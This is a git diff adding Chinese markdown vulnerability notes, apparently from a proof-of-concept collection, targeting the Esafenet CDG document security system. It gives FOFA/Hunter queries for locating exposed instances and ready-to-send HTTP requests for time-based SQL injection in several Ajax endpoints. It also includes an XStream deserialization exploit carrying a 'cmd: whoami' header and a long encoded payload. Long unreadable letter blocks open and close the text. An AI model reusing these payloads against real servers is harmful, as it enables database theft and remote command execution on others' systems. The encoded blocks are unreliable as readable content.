PIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1703403828782-3a8774fa-6cc5-47dc-be05-e0bfbf8c8c1e.png](./img/DgrdPy_Vw0EsYXrS/1703403828782-3a8774fa-6cc5-47dc-be05-e0bfbf8c8c1e-793077.png)
+
+
+
+> 更新: 2024-04-20 22:01:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/asg0x3iakl1p0c65>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞.md
new file mode 100644
index 0000000..bc74b81
--- /dev/null
+++ b/亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 亿赛通电子文档安全管理系统MultiServerAjax存在SQL注入漏洞
+
+亿某通电子文档安全管理系统` MultiServerAjax`接口的`serverId`参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
+
+## fofa
+
+```yaml
+app="亿赛通-DLP"
+```
+
+## poc
+
+```javascript
+POST /CDGServer3/js/../MultiServerAjax HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+command=delServer&serverId=-1'waitfor delay '0:0:5'--
+```
+
diff --git a/亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞.md
new file mode 100644
index 0000000..9f3b0f3
--- /dev/null
+++ b/亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞.md
@@ -0,0 +1,49 @@
+# 亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞
+
+# 一、漏洞简介
+ 亿赛通电子文档安全管理系统（简称：CDG）是一款电子文档安全加密软件，该系统利用驱动层透明加密技术，通过对电子文档的加密保护，防止内部员工泄密和外部人员非法窃取企业核心重要数据资产，对电子文档进行全生命周期防护，系统具有透明加密、主动加密、智能加密等多种加密方式，用户可根据部门涉密程度的不同（如核心部门和普通部门），部署力度轻重不一的梯度式文档加密防护，实现技术、管理、审计进行有机的结合，在内部构建起立体化的整体信息防泄露体系，使得成本、效率和安全三者达到平衡，实现电子文档的数据安全。亿赛通电子文档安全管理系统NavigationAjax存在SQL注入漏洞，攻击者可通过该漏洞获取数据库敏感信息。
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/U6wPZQCifyuPkb46/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-143086.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/js/../NavigationAjax HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Connection: close
+Content-Length: 58
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+
+command=nav&id=-999'waitfor delay '0:0:3'--+&name=&openId=
+```
+
+![1711815896185-51f664d1-4d80-4cdd-ac3d-46055a015edb.png](./img/U6wPZQCifyuPkb46/1711815896185-51f664d1-4d80-4cdd-ac3d-46055a015edb-675720.png)
+
+sqlmap
+
+```plain
+POST /CDGServer3/js/../NavigationAjax HTTP/1.1
+Host: 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Connection: close
+Content-Length: 58
+Content-Type: application/x-www-form-urlencoded
+Accept-Encoding: gzip, deflate
+
+command=nav&id=1&name=&openId=
+```
+
+![1711815990103-01f2eb07-4c45-4456-9854-a13bb709e0c7.png](./img/U6wPZQCifyuPkb46/1711815990103-01f2eb07-4c45-4456-9854-a13bb709e0c7-010306.png)
+
+
+
+> 更新: 2024-04-20 22:01:35  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/rkfurtrt642vfvu6>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞.md b/亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞.md
new file mode 100644
index 0000000..654c694
--- /dev/null
+++ b/亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞.md
@@ -0,0 +1,21 @@
+# 亿赛通电子文档安全管理系统NetSecPolicyAjax存在SQL注入漏洞
+
+亿某通电子文档安全管理系统` NetSecPolicyAjax`接口的`id`参数处对传入的数据没有预编译和充足的校验，导致该接口存在SQL注入漏洞，恶意攻击者可能通过该漏洞获取服务器信息或者直接获取服务器权限
+
+## fofa
+
+```yaml
+app="亿赛通-DLP"
+```
+
+## poc
+
+```javascript
+POST /CDGServer3/js/../NetSecPolicyAjax HTTP/1.1
+Host: your-ip
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+Content-Type: application/x-www-form-urlencoded
+
+command=upPriority&id=-1'waitfor delay '0:0:5'--
+```
+
diff --git a/亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..bb7073e
--- /dev/null
+++ b/亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统ODMSubmitApplyService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/pAmvocl6LiMwYXO4/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-014601.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/ODMSubmitApplyService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLD